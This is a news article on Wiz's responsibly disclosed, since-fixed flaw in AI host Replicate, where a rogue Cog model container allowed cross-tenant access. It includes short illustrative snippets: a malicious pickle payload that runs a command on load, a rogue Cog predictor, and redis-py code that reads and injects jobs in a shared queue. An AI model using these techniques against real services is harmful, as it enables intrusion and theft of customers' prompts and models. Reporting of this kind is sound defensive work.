Cybersecurity researchers have discovered a critical security flaw in artificial intelligence (AI)-as-a-service provider Replicate that could have allowed threat actors to gain access to proprietary AI models and sensitive information.
"Exploitation of this vulnerability would have allowed unauthorized access to the AI prompts and results of all Replicate's platform customers," cloud security firm Wiz said in a report published this week.
The issue stems from the fact that AI models are often packaged in formats that allow arbitrary code execution, which an attacker could weaponize to carry out cross-tenant attacks by means of a malicious model.
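A common example is Python's pickle serialization, which many model checkpoints rely on and which executes code during deserialization. The sketch below is a minimal illustration of the problem; the class name and command are hypothetical, not anything tied to Replicate:

```python
import os
import pickle


class MaliciousModel:
    """Illustrative only: a 'model' whose deserialization runs a command."""

    def __reduce__(self):
        # pickle will invoke os.system("id") the moment this object is loaded
        return (os.system, ("id",))


# The attacker ships this blob as a "model checkpoint"
payload = pickle.dumps(MaliciousModel())

# A service that merely loads the checkpoint runs the attacker's command
pickle.loads(payload)
```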

Replicate makes use of an open-source tool called Cog to containerize and package machine learning models, which can then be deployed either in a self-hosted environment or to Replicate.
Wiz said it created a rogue Cog container and uploaded it to Replicate, ultimately using it to achieve remote code execution on the service's infrastructure with elevated privileges.
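A Cog package is driven by a predict.py whose Predictor class is ordinary Python, so any code an author places in setup() or predict() runs when the container serves requests. The following is a rough sketch of what a rogue predictor could look like, not the actual payload Wiz used:

```python
# predict.py inside a hypothetical rogue Cog package (illustrative sketch only)
import subprocess

from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self):
        # Arbitrary code runs as soon as the container starts serving requests,
        # e.g. enumerating the environment it landed in
        subprocess.run(["env"], check=False)

    def predict(self, prompt: str = Input(description="Ignored")) -> str:
        # The "model" does nothing useful; the point is the code execution above
        return "ok"
```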
"We suspect this code-execution technique is a pattern, where companies and organizations run AI models from untrusted sources, even though these models are code that could potentially be malicious," security researchers Shir Tamari and Sagi Tzadik said.
The attack technique devised by the company then leveraged an already-established TCP connection associated with a Redis server instance within the Kubernetes cluster hosted on the Google Cloud Platform to inject arbitrary commands.
What's more, with the centralized Redis server being used as a queue to manage multiple customer requests and their responses, the researchers found it could be abused to facilitate cross-tenant attacks by tampering with the process in order to insert rogue tasks that could impact the results of other customers' models.
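Because every tenant's jobs flow through that shared Redis queue, an attacker with a foothold on the cluster could in principle read or inject entries. The sketch below uses redis-py to illustrate the idea; the host, queue name, and job format are assumptions for illustration, not Replicate's internals (and Wiz's actual path reused an existing TCP connection rather than connecting directly):

```python
import json

import redis

# Hypothetical coordinates for illustration only
r = redis.Redis(host="redis.internal.example", port=6379)

# Read queued prediction jobs belonging to other tenants
for raw in r.lrange("prediction-queue", 0, -1):  # queue name is illustrative
    job = json.loads(raw)
    print(job.get("model"), job.get("input"))

# Inject a rogue task that would be processed as if it came from another customer
rogue_job = {"model": "victim/model", "input": {"prompt": "attacker-controlled"}}
r.lpush("prediction-queue", json.dumps(rogue_job))
```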
Such rogue manipulations not only threaten the integrity of the AI models, but also pose significant risks to the accuracy and reliability of AI-driven outputs.
"An attacker could have queried the private AI models of customers, potentially exposing proprietary knowledge or sensitive data involved in the model training process," the researchers said. "Additionally, intercepting prompts could have exposed sensitive data, including personally identifiable information (PII)."

The flaw, which was responsibly disclosed in January 2024, has since been addressed by Replicate. There is no evidence that the vulnerability was exploited in the wild to compromise customer data.
The disclosure comes a little over a month after Wiz detailed now-patched risks in platforms like Hugging Face that could allow threat actors to escalate privileges, gain cross-tenant access to other customers' models, and even take over continuous integration and continuous deployment (CI/CD) pipelines.
"Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers, because attackers may leverage these models to perform cross-tenant attacks," the researchers concluded.
"The potential impact is devastating, as attackers may be able to access the millions of private AI models and apps stored within AI-as-a-service providers."